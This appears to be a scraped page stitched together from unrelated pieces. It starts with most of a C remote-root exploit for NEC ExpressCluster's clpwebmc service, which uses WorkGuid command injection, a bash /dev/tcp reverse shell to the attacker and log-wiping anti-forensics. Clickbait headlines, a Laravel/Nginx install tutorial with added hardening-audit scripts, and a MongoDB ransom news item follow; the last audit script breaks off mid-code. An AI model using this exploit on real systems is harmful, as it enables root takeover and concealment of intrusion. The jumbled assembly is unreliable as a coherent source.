 *   the following C code:
 *
 *   void
 *   remove_dir_path(char *WorkGuidParameter)
 *   {
 *       char x[128];
 *       snprintf(x, sizeof(x), "rm -fr /opt/nec/clusterpro/%s",
 *           WorkGuidParameter);
 *       system(x);
 *   }
 *
 *   No input sanitation is performed and the supplied arguments are passed
 *   straight on to system(). By setting the WorkGuid parameter to '0' and
 *   appending a semicolon followed by arbitrary commands it is possible to
 *   execute those commands as root on the remote machine.
 *
 *   Example HTTP GET request with command injection:
 *   GET /DeleteWorkDirectory.js?WorkGuid=0;id>/tmp/id.txt
 *
 *   Which results on the remote host:
 *   $ ls -la /tmp/id.txt
 *   -rw-rw-rw- 1 root root 57 Apr 20 16:37 /tmp/id.txt
 *   $ cat /tmp/id.txt
 *   uid=0(root) gid=0(root) groups=0(root)
 *
 * - tested vulnerable versions:
 *   NEC EXPRESSCLUSTER X 3.3.0-1 for Linux(x86_64) on CentOS 6
 *   NEC EXPRESSCLUSTER X 3.1 for Linux(x86_64) on CentOS 6
 *   NEC EXPRESSCLUSTER X 2.1.4-1 for Linux(x86_64) on CentOS 6
 *   NEC ExpressCluster X LAN for Linux 2.0.2-1 i686 on CentOS 5
 *   NEC ExpressCluster X WAN for Linux 2.0.2-1 i686 on CentOS 5
 *
 * - tested versions not vulnerable:
 *   NEC ExpressCluster SE for Linux 3.1 i386 on RHEL 4
 *
 * - exploit details:
 *   This exploit is fully "weaponized" as they call it nowadays. It starts a
 *   listening port on the attacking host and connects back from the victim host
 *   using bash /dev/tcp redirection. The attacking host cannot be behind NAT or
 *   run a firewall due to the nature of connect-back.
 *
 *   A payload system is utilised where commands are encoded to hex and split into
 *   chunks. These chunks are then sent one by one to the victim host and appended
 *   to a temporary file using 'echo -ne'. The temporary file gets executed in the
 *   last request.
 *
 *   For OPSEC purposes the temporary file will destroy itself and
 *   all traces of the exploit and your IP will be deleted from these log files:
 *   /opt/nec/clusterpro/log/webmgr.log.cur
 *   /opt/nec/clusterpro/log/webmgr.err.cur
 *
 * - exploit compilation:
 *   gcc -Wall clpwebmc0day-v2.c -o clpwebmc0day-v2
 *
 * - the exploit connect-back listener is confirmed to work on:
 *   CentOS 6
 *   Fedora 22
 *   OS X 10.10.5
 *
 */

#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <fcntl.h>
#include <netdb.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

#define HDR "NEC EXPRESS CLUSTER clpwebmc Linux remote root exploit by cenobyte"
#define HEAD "HEAD / HTTP/1.1"
#define CLPWEBMCPORT 29003
#define DEFAULTPORT 8080
#define GET "GET /DeleteWorkDirectory.js?WorkGuid=0;" /* the vulnerability */
#define INFO "GET /GetConfiguration.js?WebMgrVersion=0" /* nice info leak */
#define AUTH "Authorization: admin:"
#define HTTP " HTTP/1.1\n"
#define CRLF "\n\n"
#define BUFSIZE 1024
#define MAXPROCCMD 194 /* max len of request.c: process_command parameter */
#define CMD "unset HISTFILE; cd /; /bin/uname -a; /usr/bin/id\n"
#define CHMOD "chmod 755 "
#define OVERWRITE "head -1024 /dev/urandom>"
#define UNLINK "rm -f "
#define ECHOAUTH "%secho -ne \"%s\">>%s%s%s%s"
#define ECHO "%secho -ne \"%s\">>%s%s"
#define LOG "/opt/nec/clusterpro/log/webmgr"
#define ECPATH "/opt/nec/clusterpro/0"

/* use the logged info leak GET request to find out the IP to connect-back */
#define CONNECTBACK "(/bin/bash 0</dev/tcp/" \
    "$(grep GetConfiguration %s.log.cur|" \
    "grep IP=|tail -1|tr ':' '\\n'|" \
    "grep Root=1|cut -d, -f1)" \
    "/%d 1>&0 2>&0) &"

/* remove all log entries that reveal the vulnerability, exploit and our IP */
#define ANTIFOR "(sleep 5;for x in log err;do " \
    "grep -vE 'd=0|n=0|%s|check_pass|system' %s.$x.cur>%s.0;" \
    "cat %s.0>%s.$x.cur;" \
    "rm -f %s.0;" \
    "done) &"

/* TMPPATH is the remote directory where the payload will be stored, you could
 * use /tmp but there's a fair chance that the sysadmin has mounted that with
 * 'noexec' */
#define TMPPATH "/opt/nec/clusterpro/log"

int sock;
int listsock;
int list_s;
int flags;
int port = CLPWEBMCPORT;
int connectback = DEFAULTPORT;
extern char *__progname;
char *host;
char *md5;

int
validport(int port, char *p)
{
    if ((port < 1) || (port > 65535)) {
        printf("error: %d is an invalid %s port\n", port, p);
        return(1);
    }
    return(0);
}

void
usage()
{
    printf("usage: %s -h <host> [-p|-c|-m]\n", __progname);
    printf("\t-p [port (default: %d)]\n", port);
    printf("\t-c [connect-back port (default: %d)]\n", connectback);
    printf("\t-m [admin user md5 hash]\n\n");
    exit(1);
}

char *
genrandom()
{
    int len = strlen(TMPPATH) + 8;
    int n;
    char *s = "AbCdEfGhIjKlMnOpQrXtUvWxYz";
    char *r = malloc(sizeof(char)*(len + 1));

    sprintf(&r[0], "%s/", TMPPATH);
    srand(time(NULL));
    for (n = strlen(TMPPATH) + 1; n < len; n++)
        r[n] = s[rand() % strlen(s)];
    r[len] = '\0';
    return(r);
}

int
opensock(char *host, unsigned short int port)
{
    int s;
    struct hostent *target;
    struct sockaddr_in addr;

    target = gethostbyname(host);
    if (target == NULL) {
        perror("gethostbyname");
        exit(1);
    }
    s = socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
    if (s == -1) {
        perror("socket");
        exit(1);
    }
    memcpy(&addr.sin_addr, target->h_addr, target->h_length);
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        perror("connect");
        exit(1);
    }
    return(s);
}

void
sendsock(char *buf)
{
    char readbuf[1024];

    if (strlen(buf) >= MAXPROCCMD) {
        printf("sendsock() max len exceeded");
        exit(1);
    }
    sock = opensock(host, port);
    if (write(sock, buf, strlen(buf)) < 0) {
        perror("write");
        exit(1);
    }
    if (write(sock, CRLF, strlen(CRLF)) < 0) {
        perror("write");
        exit(1);
    }
    if (read(sock, readbuf, sizeof(readbuf) - 1) < 0) {
        perror("read");
        exit(1);
    }
    if (strstr(readbuf, "HTTP/1.1 200 OK") == NULL) {
        if (strstr(readbuf, "HTTP/1.1 403 Forbidden") != NULL)
            printf("[!] md5 hash is invalid %s\n", md5);
        else
            printf("[!] unknown error: [%s][%lu]\n", readbuf, strlen(readbuf));
        exit(1);
    }
#ifdef VERBOSE
    printf("[-] sendsock(): HTTP/1.1 200 OK\n");
#endif
    close(sock);
}

void
writepayload(char *p, char *path)
{
    char buf[MAXPROCCMD];

    if (md5 == NULL)
        snprintf(buf, sizeof(buf), ECHO, GET, p, path, HTTP);
    else
        snprintf(buf, sizeof(buf), ECHOAUTH, GET, p, path, HTTP, AUTH, md5);
    if (strlen(buf) > MAXPROCCMD) {
        printf("writepayload(): \"%s\" size exceeds MAXPROCCMD\n", buf);
        exit(1);
    }
    sendsock(buf);
}

void
execpayload(char *path)
{
    char buf[MAXPROCCMD];

    printf("[*] executing payload\n");
    if (md5 == NULL) {
        snprintf(buf, sizeof(buf), "%s%s%s%s", GET, CHMOD, path, HTTP);
        sendsock(buf);
        snprintf(buf, sizeof(buf), "%s%s%s", GET, path, HTTP);
        sendsock(buf);
    } else {
        snprintf(buf, sizeof(buf), "%s%s%s%s%s%s", GET, CHMOD, path, HTTP, AUTH, md5);
        sendsock(buf);
        snprintf(buf, sizeof(buf), "%s%s%s%s%s", GET, path, HTTP, AUTH, md5);
        sendsock(buf);
    }
}

void
sendcmd(char *p, char *path)
{
    int i;
    int n = 1;
    int c = 0;
    int maxchunksize;
    int req;
    static char buf[MAXPROCCMD];

    if (md5 == NULL) {
        req = strlen(GET) + strlen(HTTP) + strlen(path) + \
            strlen(ECHO) + strlen(CRLF);
    } else {
        req = strlen(GET) + strlen(HTTP) + strlen(path) + \
            strlen(ECHOAUTH) + strlen(CRLF) + strlen(AUTH) + \
            strlen(md5);
    }
#ifdef VERBOSE
    printf("[-] command: \"%s\"\n", p);
#endif
    maxchunksize = (MAXPROCCMD - req) / 4;

    /* make the payload destroy itself on the filesystem during execution */
    printf("[*] adding self destruct to payload: %s\n", path);
    snprintf(buf, sizeof(buf), "%s%s 2>&1;", OVERWRITE, path);
    writepayload(buf, path);
    snprintf(buf, sizeof(buf), "%s%s;", UNLINK, path);
    writepayload(buf, path);

    if (strlen(p) > maxchunksize) {
        printf("[-] command exceeds available space in GET request\n");
        printf("[-] have to split in chunks\n");
    }
    printf("[*] uploading command payload to: %s\n", path);
    printf(" payload size: %lu\n", strlen(p));
    printf(" payload chunk space: %d\n", maxchunksize);
    printf(" number of chunks: %lu\n", strlen(p) / maxchunksize);
    printf("[*] uploading:\n");
    printf(" chunk %d", n);
#ifdef VERBOSE
    printf(" | ");
#endif
    /* turn commands into a hex payload of 'maxchunksize' byte chunks which
     * are saved to the filesystem. this is to bypass '&' filtering and to
     * get around the maximum size of GET requests allowed by clpwebmc */
    for (i = 0; i < strlen(p); i++) {
        sprintf(&buf[c * 4],"\\x%02x", p[i]);
#ifdef VERBOSE
        printf(" %c ", p[i]);
#endif
        if (c == (maxchunksize - 1)) {
#ifdef VERBOSE
            printf("\n chunk %d", n);
            printf(" | %s", buf);
#endif
            printf("\n");
            writepayload(buf, path);
            c = 0;
            n++;
            printf(" chunk %d", n);
#ifdef VERBOSE
            printf(" | ");
#endif
        } else {
            c++;
        }
    }
#ifdef VERBOSE
    printf("\n chunk %d", n);
    printf(" | %s", buf);
#endif
    printf("\n");
    writepayload(buf, path);
    execpayload(path);
}

void
checkserver()
{
    char buf[BUFSIZE];

    sock = opensock(host, port);
    if (write(sock, HEAD, strlen(HEAD)) < 0) {
        perror("write");
        exit(1);
    }
    if (write(sock, CRLF, strlen(CRLF)) < 0) {
        perror("write");
        exit(1);
    }
    if (read(sock, buf, sizeof(buf) - 1) < 0) {
        perror("read");
        exit(1);
    }
    close(sock);
    /* older clpwebmc versions present themselves as: ClusterProWebmanager
     * newer versions use: ClusterWebmanager */
    if (strstr(buf, "Server: Cluster") == NULL || \
        strstr(buf, "Webmanager") == NULL) {
        printf("error: %s:%d is not running clpwebmc\n", host, port);
        exit(1);
    }
    /* this GET request gets logged */
    sock = opensock(host, port);
    if (write(sock, INFO, strlen(INFO)) < 0) {
        perror("write");
        exit(1);
    }
    if (write(sock, CRLF, strlen(CRLF)) < 0) {
        perror("write");
        exit(1);
    }
    if (read(sock, buf, sizeof(buf) - 1) < 0) {
        perror("read");
        exit(1);
    }
    close(sock);
    /* OS checker
     * WebMgrVersion="WebMgr2.1.1_Linux"
     * WebMgrVersion="WebMgr3.0.0_Win" */
    if (strstr(buf, "_Linux\"") == NULL) {
        printf("\n");
        printf("[!] cannot exploit, %s is not running Linux\n", host);
        printf(" (your IP has been logged by the target system)\n");
        exit(1);
    }
    printf("[-] %s:%d is Linux running clpwebmc\n", host, port);
    if ((strstr(buf, "NeedPasswdAuth=0") == NULL) && (md5 == NULL)) {
        printf("[!] cannot exploit: clpwebmc has a password set\n");
        printf(" see usage how to send an admin password\n");
        printf(" (your IP has been logged by the target system)\n");
        printf("\n");
        usage();
        exit(1);
    }
}

void
setuplistener()
{
    struct sockaddr_in addr;

    printf("[*] setting up connect-back listener on port: %d\n", connectback);
    if ((list_s = socket(AF_INET, SOCK_STREAM, 0)) < 0 ) {
        perror("socket");
        exit(1);
    }
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    addr.sin_port = htons(connectback);
    if (bind(list_s, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
        perror("bind");
        exit(1);
    }
    if (listen(list_s, BUFSIZE) < 0) {
        perror("listen");
        exit(1);
    }
    /* set O_NONBLOCK on listening socket */
    flags = fcntl(list_s, F_GETFL, 0);
    if (fcntl(list_s, F_SETFL, flags | O_NONBLOCK) == -1) {
        perror("fcntl");
        exit(1);
    }
}

void
connectshell()
{
    int p;
    char buf[BUFSIZE];
    struct timeval tm;
    fd_set rset;

    printf("[*] connecting to shell\n");
#ifdef __APPLE__
    /* remove O_NONBLOCK flag on OS X machines */
    flags = fcntl(list_s, F_GETFL, 0);
    if (fcntl(list_s, F_SETFL, flags |~ O_NONBLOCK) == -1) {
        perror("fcntl");
        exit(1);
    }
#endif
    if ((listsock = accept(list_s, NULL, NULL)) < 0) {
        perror("accept");
        exit(1);
    }
    p = send(listsock, CMD, strlen(CMD), 0);
    if (p == -1) {
        perror("send");
        exit(1);
    }
    printf("[-] connect-back successful\n\n");
    tm.tv_sec = 10;
    tm.tv_usec = 0;
    while (1) {
        FD_ZERO(&rset);
        FD_SET(listsock, &rset);
        FD_SET(STDIN_FILENO, &rset);
        select(listsock + 1, &rset, NULL, NULL, &tm);
        if (FD_ISSET(listsock, &rset)) {
            p = read(listsock, buf, sizeof(buf) - 1);
            if (p <= 0)
                exit(0);
            buf[p] = 0;
            printf("%s", buf);
        }
        if (FD_ISSET(STDIN_FILENO, &rset)) {
            p = read(STDIN_FILENO, buf, sizeof(buf) - 1);
            if (p > 0) {
                buf[p] =
0; write(listsock, buf, p); } } } } int main(int argc, char *argv[]) { int opt; char cmd[BUFSIZE]; printf("%s\n\n", HDR); if (argc < 3) usage(); while ((opt = getopt(argc, argv, "h:p:c:m:")) != -1) switch (opt) { case 'h': host = optarg; break; case 'p': port = atoi(optarg); if (validport(port, "target") != 0) exit(1); break; case 'c': connectback = atoi(optarg); if (validport(connectback, "connect-back") != 0) exit(1); break; case 'm': md5 = optarg; printf("[-] using admin auth: %s\n", md5); break; default: usage(); } if (host == NULL) usage(); checkserver(); setuplistener(); snprintf(cmd, sizeof(cmd), CONNECTBACK, LOG, connectback); sendcmd(cmd, genrandom()); /* remove all traces of the payload that were logged by webmgr * also remove all remove_tmp_webm system entries as it reveals our vuln */ printf("[-] anti-forensics: %s.log.cur and %s.err.cur\n", LOG, LOG); snprintf(cmd, sizeof(cmd), ANTIFOR, ECPATH, LOG, LOG, LOG, LOG, LOG); sendcmd(cmd, genrandom()); connectshell(); /* never reached */ return(0); } Download clpwebmc0day-v3.c Source
  22. Choosing the right baby bottle sterilizers
Which are the best baby bottles for babies
Bizarre habits that can surprise you abroad
What we need to know about contact lenses
The moments before disasters, in funny pictures
Ideal around the house: 10 little-known uses of aluminum foil
Foods that become toxic in the microwave oven
Eight smartphone apps you didn't know about
How to prepare before going on vacation
And more...

Learn to read Chinese ... with ease! | ShaoLan

Fastest Way to Tie a Tie EVER
  23. Laravel is an open source PHP framework that follows the MVC (Model-View-Controller) design pattern. It was created by Taylor Otwell in 2011 as an attempt to provide an advanced alternative to the CodeIgniter (CI) framework. In 2011, the Laravel project released versions 1 and 2; this year version 5.4 has been released with many improvements like Command-Line (CLI) support named 'artisan', built-in support for more database types and improved routing.

In this tutorial, I will show you how to install the Laravel Web Framework with the Nginx web server, PHP-FPM 7.1 and MariaDB on a CentOS 7 system. I will show you step by step how to install and configure Laravel under the LEMP stack on a CentOS 7 server.

Prerequisites:

    CentOS 7 Server.
    Root privileges.

Step 1 - Install the EPEL Repository

EPEL or Extra Packages for Enterprise Linux is an additional package repository that provides useful software packages that are not included in the official CentOS repository. It can be installed on RPM based Linux distributions like CentOS and Fedora. In this tutorial, we need the EPEL repository for the Nginx installation, as Nginx packages do not exist in the official CentOS repository.

Install the EPEL repository with the yum command below.

    yum -y install epel-release

The EPEL repository has been installed.

Step 2 - Install Nginx

In this tutorial, we will run Laravel under the LEMP stack. Nginx is the web server part of the LEMP stack and can be installed from the EPEL repository.

Install Nginx 1.10 from the EPEL repository with yum.

    yum -y install nginx

When the installation is complete, start Nginx and enable it to start at boot time.

    systemctl start nginx
    systemctl enable nginx

Nginx is running on port 80; check it with the netstat command below.

    netstat -plntu

In case you get 'Command not found' as the result, install the net-tools package as shown below.

    yum -y install net-tools

Step 3 - Install and Configure PHP-FPM 7.1

Laravel can be installed on a server with PHP version >= 5.6.4. In this tutorial, we will use the latest version PHP 7.1 that is supported by Laravel. PHP 7.1 does not exist in the CentOS base repository, so we need to install it from a third party repository named 'webtatic'.

Install the webtatic repository with this rpm command.

    rpm -Uvh https://mirror.webtatic.com/yum/el7/webtatic-release.rpm

Now we can install PHP-FPM with all of the extensions needed by Laravel with a single yum command.

    yum install -y php71w php71w-curl php71w-common php71w-cli php71w-mysql php71w-mbstring php71w-fpm php71w-xml php71w-pdo php71w-zip

PHP 7.1 has been installed on our CentOS 7 system. Next, configure PHP by editing the configuration file php.ini with vim.

    vim /etc/php.ini

Uncomment the line below and change the value to 0.

    cgi.fix_pathinfo=0

Save the file and exit the editor. Now edit the PHP-FPM file www.conf.

    vim /etc/php-fpm.d/www.conf

PHP-FPM will run under the user and group 'nginx', so change the value of the two lines below to 'nginx'.

    user = nginx
    group = nginx

Instead of using the server port, PHP-FPM will run under a socket file. Change the 'listen' value to the path '/run/php-fpm/php-fpm.sock' as shown below.

    listen = /run/php-fpm/php-fpm.sock

The socket file owner will be the 'nginx' user, and the permission mode is 660. Uncomment and change all values like this:

    listen.owner = nginx
    listen.group = nginx
    listen.mode = 0660

For the environment variables, uncomment these lines and set the values as shown below.

    env[HOSTNAME] = $HOSTNAME
    env[PATH] = /usr/local/bin:/usr/bin:/bin
    env[TMP] = /tmp
    env[TMPDIR] = /tmp
    env[TEMP] = /tmp

Save the file and exit vim, then start PHP-FPM and enable it to run at boot time.

    systemctl start php-fpm
    systemctl enable php-fpm

PHP-FPM is running under the socket file; check it with the command below.

    netstat -pl | grep php-fpm.sock

The PHP and PHP-FPM 7.1 installation and configuration have been completed.

Step 4 - Install MariaDB Server

You can use MySQL or PostgreSQL for your Laravel project. I will use the MariaDB database server for this tutorial. It's available in the CentOS repository. Install the MariaDB server with the yum command below.

    yum -y install mariadb mariadb-server

When the installation is complete, start 'mariadb' and enable it to start at boot time.

    systemctl start mariadb
    systemctl enable mariadb

MariaDB has been started and is running on port 3306; check it with the netstat command.

    netstat -plntu

Next, configure the root password for MariaDB with the 'mysql_secure_installation' command below.

    mysql_secure_installation

Type in your MariaDB root password, remove the anonymous user etc.

    Set root password? [Y/n] Y
    Remove anonymous users? [Y/n] Y
    Disallow root login remotely? [Y/n] Y
    Remove test database and access to it? [Y/n] Y
    Reload privilege tables now? [Y/n] Y

MariaDB installation and configuration have been completed.

Step 5 - Install PHP Composer

PHP Composer is a package manager for the PHP programming language. It was created in 2011 and is inspired by Node.js's 'npm' and Ruby's 'bundler' installer. Install Composer with the curl command.

    curl -sS https://getcomposer.org/installer | sudo php -- --install-dir=/usr/bin --filename=composer

When the installation has completed, try to use the 'composer' command and you will see the results as below.

    composer

PHP Composer is installed on CentOS 7.

Step 6 - Configure Nginx Virtual Host for Laravel

In this step, we will create the Nginx virtual host configuration for the Laravel project. We need to define the web root directory for this Laravel installation; I will use the '/var/www/laravel' directory as the web root directory. Create it with the mkdir command below:

    mkdir -p /var/www/laravel

Next, go to the Nginx directory and create a new virtual host configuration file laravel.conf in the conf.d directory.

    cd /etc/nginx
    vim conf.d/laravel.conf

Paste the configuration below into the file:

    server {
        listen 80;
        listen [::]:80 ipv6only=on;

        # Log files for Debugging
        access_log /var/log/nginx/laravel-access.log;
        error_log /var/log/nginx/laravel-error.log;

        # Webroot Directory for Laravel project
        root /var/www/laravel/public;
        index index.php index.html index.htm;

        # Your Domain Name
        server_name laravel.hakase-labs.co;

        location / {
            try_files $uri $uri/ /index.php?$query_string;
        }

        # PHP-FPM Configuration Nginx
        location ~ \.php$ {
            try_files $uri =404;
            fastcgi_split_path_info ^(.+\.php)(/.+)$;
            fastcgi_pass unix:/run/php-fpm/php-fpm.sock;
            fastcgi_index index.php;
            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
            include fastcgi_params;
        }
    }

Save the file and exit vim. Test the Nginx configuration and make sure there is no error, then restart the Nginx service.

    nginx -t
    systemctl restart nginx

The Nginx virtual host configuration for Laravel has been completed.

Step 7 - Install Laravel

Before installing Laravel, we need to install unzip on the server.

    yum -y install unzip

Now go to the Laravel web root directory '/var/www/laravel'.

    cd /var/www/laravel

Laravel provides two ways to install the framework on the server. We can install Laravel with the Laravel installer, or we can install it with PHP Composer. In this tutorial, I will install Laravel by creating a new project with the composer command. Run the command below to install Laravel.

    composer create-project laravel/laravel .

Wait for the Laravel installation to finish. This may take some time. When the installation is complete, change the owner of the Laravel web root directory to the 'nginx' user, and change the permissions of the storage directory to 755 with the commands below.

    chown -R nginx:root /var/www/laravel
    chmod 755 /var/www/laravel/storage

Laravel installation has been completed.

Step 8 - Configure SELinux

In this tutorial, Laravel will run under SELinux 'Enforcing' mode. To check the SELinux status, run the command below.

    sestatus

The result is that SELinux is running in 'Enforcing' mode. Next, we need to install the SELinux management tools for CentOS 7. Install 'policycoreutils-python' on the server.

    yum -y install policycoreutils-python

Now we need to change the context of the Laravel directories and then apply the changes with the restorecon command. Run the SELinux management commands as shown below.

    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel(/.*)?'
    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/public(/.*)?'
    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/storage(/.*)?'
    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/app(/.*)?'
    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/bootstrap(/.*)?'
    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/config(/.*)?'
    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/database(/.*)?'
    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/resources(/.*)?'
    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/routes(/.*)?'
    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/vendor(/.*)?'
    semanage fcontext -a -t httpd_sys_rw_content_t '/var/www/laravel/tests(/.*)?'
    restorecon -Rv '/var/www/laravel/'

SELinux configuration for Laravel is done.

Step 9 - Testing Laravel

Open your web browser and type in the Laravel URL of your server. We've defined the domain name for Laravel in the Nginx virtual host file. Mine is laravel.hakase-labs.co. When you visit the domain name, you will see the Laravel home page.

Laravel installation with Nginx, PHP-FPM 7, and MariaDB on CentOS 7 has been successful.

Reference
https://laravel.com/docs/5.4/installation

Source
https://www.howtoforge.com/tutorial/how-to-install-laravel-5x-with-nginx-and-php-fpm-7-on-centos-7/
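Several of the settings in the tutorial above are there for security rather than for getting Laravel to render: cgi.fix_pathinfo=0 and the try_files $uri =404 line in the PHP location together stop Nginx plus PHP-FPM from executing an uploaded file such as /uploads/x.jpg/foo.php as PHP; the pool running as the unprivileged nginx user on a 0660 unix socket keeps other local users off the FastCGI channel; and pointing root at /var/www/laravel/public keeps .env, app/ and the rest of the project out of the web tree. The POSIX shell script below is an added example, not part of the howtoforge tutorial or of Laravel, that audits those settings after the install. The audit_lemp function, its three file arguments and the constructed sample files it writes to a temp directory are assumptions of this example; on a real server you would pass /etc/php.ini, /etc/php-fpm.d/www.conf and /etc/nginx/conf.d/laravel.conf.

```shell
#!/bin/sh
# Added example: post-install audit of the hardening settings the tutorial sets.
# Not from the tutorial or from Laravel; file paths are passed in by the caller.

# check_setting FILE REGEX LABEL -> prints PASS/FAIL, returns 0 on PASS
check_setting() {
    file=$1; pattern=$2; label=$3
    if grep -Eq "$pattern" "$file" 2>/dev/null; then
        echo "PASS: $label ($file)"
        return 0
    fi
    echo "FAIL: $label ($file)"
    return 1
}

# audit_lemp PHP_INI WWW_CONF NGINX_CONF -> returns the number of failed checks
audit_lemp() {
    php_ini=$1; www_conf=$2; nginx_conf=$3
    fails=0
    # cgi.fix_pathinfo=0: PHP-FPM must not "fix" /x.jpg/foo.php into /x.jpg and run it
    check_setting "$php_ini" '^[[:space:]]*cgi\.fix_pathinfo[[:space:]]*=[[:space:]]*0' \
        'cgi.fix_pathinfo=0' || fails=$((fails+1))
    # pool runs as the unprivileged nginx user, not apache or root
    check_setting "$www_conf" '^[[:space:]]*user[[:space:]]*=[[:space:]]*nginx' \
        'php-fpm pool user=nginx' || fails=$((fails+1))
    check_setting "$www_conf" '^[[:space:]]*group[[:space:]]*=[[:space:]]*nginx' \
        'php-fpm pool group=nginx' || fails=$((fails+1))
    # unix socket instead of a TCP port, with 0660 permissions
    check_setting "$www_conf" '^[[:space:]]*listen[[:space:]]*=[[:space:]]*/run/php-fpm/php-fpm\.sock' \
        'php-fpm listens on unix socket' || fails=$((fails+1))
    check_setting "$www_conf" '^[[:space:]]*listen\.mode[[:space:]]*=[[:space:]]*0660' \
        'socket mode 0660' || fails=$((fails+1))
    # nginx document root is public/, so .env and app/ are never served
    check_setting "$nginx_conf" '^[[:space:]]*root[[:space:]]+/var/www/laravel/public;' \
        'nginx root is laravel/public' || fails=$((fails+1))
    # try_files $uri =404 in the php location refuses paths whose .php file does not exist
    check_setting "$nginx_conf" 'try_files[[:space:]]+\$uri[[:space:]]+=404;' \
        'php location has try_files $uri =404' || fails=$((fails+1))
    return "$fails"
}

# Constructed sample files (assumption of this example) so it runs offline:
# one set as the tutorial leaves them, one set with stock CentOS defaults.
write_samples() {
    dir=$1
    printf 'cgi.fix_pathinfo=0\n' > "$dir/php.ini"
    printf 'user = nginx\ngroup = nginx\nlisten = /run/php-fpm/php-fpm.sock\nlisten.owner = nginx\nlisten.group = nginx\nlisten.mode = 0660\n' > "$dir/www.conf"
    printf 'server {\n    root /var/www/laravel/public;\n    location ~ \\.php$ {\n        try_files $uri =404;\n    }\n}\n' > "$dir/laravel.conf"
    # defaults: fix_pathinfo commented out, pool as apache, TCP port, root above public/
    printf ';cgi.fix_pathinfo=1\n' > "$dir/php.ini.default"
    printf 'user = apache\ngroup = apache\nlisten = 127.0.0.1:9000\n' > "$dir/www.conf.default"
    printf 'server {\n    root /var/www/laravel;\n    location ~ \\.php$ {\n        fastcgi_pass 127.0.0.1:9000;\n    }\n}\n' > "$dir/laravel.conf.default"
}

# Stand-alone demo over the constructed samples.
tmp=$(mktemp -d)
write_samples "$tmp"
echo "== configuration as left by the tutorial =="
rc=0; audit_lemp "$tmp/php.ini" "$tmp/www.conf" "$tmp/laravel.conf" || rc=$?
echo "failed checks: $rc"
echo "== stock defaults =="
rc=0; audit_lemp "$tmp/php.ini.default" "$tmp/www.conf.default" "$tmp/laravel.conf.default" || rc=$?
echo "failed checks: $rc"
rm -rf "$tmp"
```

The regexes are anchored to the start of the line so a commented-out `;cgi.fix_pathinfo=0` or `#root ...` does not count as a pass, which is the usual way such an audit is fooled.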
  24. Security researchers Dylan Katz and Victor Gevers confirmed that another 26,000 MongoDB servers were hit in a new wave of ransom attacks.

Ransom attacks on MongoDB databases resumed over the weekend after an apparent pause. According to the security researchers Dylan Katz and Victor Gevers, three new groups appeared on the threat landscape and hijacked over 26,000 servers; one of them, in particular, is responsible for hijacking 22,000 machines.

    Email address            Victims   Ransom demand   Bitcoin address
    cru3lty@safe-mail.net    22,449    0.2 BTC         Bitcoin address
    wolsec@secmail.pro       3,516     0.05 BTC        Bitcoin address
    mongodb@tfwno.gf         839       0.15 BTC        Bitcoin address

The security duo believes the attacks are a continuation of the wave of ransom attacks on MongoDB called MongoDB Apocalypse that peaked in January 2017. The attacks were discovered by the co-founder of the GDI Foundation, Victor Gevers, who warned of poor security for MongoDB installations in the wild. In January, the security expert discovered 196 instances of MongoDB that were wiped by Harak1r1 and held for ransom.

Multiple hacking groups scanned the internet for MongoDB installs left open for external connections and replaced their content with a ransom demand. The analysis of the Bitcoin wallet used by Harak1r1 revealed that at least 22 victims appeared to have paid. Many experts in the security community contributed to tracking the attacks; over 45,000 installs were compromised. Hackers also targeted other DBMSs, such as MySQL, ElasticSearch, Hadoop, Cassandra, and CouchDB.

Back to the present, new groups launched a new wave of attacks against MongoDB databases. Compared with MongoDB Apocalypse, the number of compromised databases has decreased with respect to the first wave of attacks. Gevers told Bleeping Computer that even if there are fewer attackers, the impact is larger. The experts are now investigating the cause of the success of the attacks.

Via http://securityaffairs.co/wordpress/62717/cyber-crime/mongodb-ransom-attacks.html
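The instances hit in both waves share one property: mongod was reachable from the internet and accepted connections without authentication, so anyone who could connect could drop every database and leave a ransom note in its place. As an added example that is not from the article, from the researchers or from MongoDB, the POSIX shell function below audits a mongod.conf (the YAML format) for the two settings that decide this, net.bindIp and security.authorization. The audit_mongod function, its treatment of an unset bindIp as a finding (mongod releases before 3.6 listened on all interfaces when it was unset) and the constructed sample files are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit mongod.conf for network exposure and missing auth.
# Not from the article or from MongoDB; the conf path is passed by the caller.

# audit_mongod CONF -> prints one PASS/FAIL line per setting and returns the
# number of findings (0 when bound to loopback only and authorization enabled)
audit_mongod() {
    conf=$1
    findings=0
    # Flatten the two-level YAML into "section.key=value" lines. A non-indented
    # "key:" opens a section; indented "key: value" lines belong to it. Lines
    # starting with '#' (commented-out settings) are ignored.
    kv=$(awk '
        /^[^ \t#][^:]*:[ \t]*$/ { sub(/:.*/, ""); section = $0; next }
        /^[ \t]+[^ \t#][^:]*:[ \t]*[^ \t]/ {
            line = $0
            sub(/^[ \t]+/, "", line)
            i = index(line, ":")
            key = substr(line, 1, i - 1)
            val = substr(line, i + 1)
            sub(/^[ \t]+/, "", val); sub(/[ \t]+$/, "", val); gsub(/"/, "", val)
            print section "." key "=" val
        }' "$conf")
    bind=$(printf '%s\n' "$kv" | sed -n 's/^net\.bindIp=//p')
    auth=$(printf '%s\n' "$kv" | sed -n 's/^security\.authorization=//p')

    # net.bindIp: every listed address must be a loopback address
    exposed=0
    if [ -z "$bind" ]; then
        exposed=1   # unset: pre-3.6 releases listen on all interfaces
    else
        for ip in $(printf '%s' "$bind" | tr ',' ' '); do
            case "$ip" in
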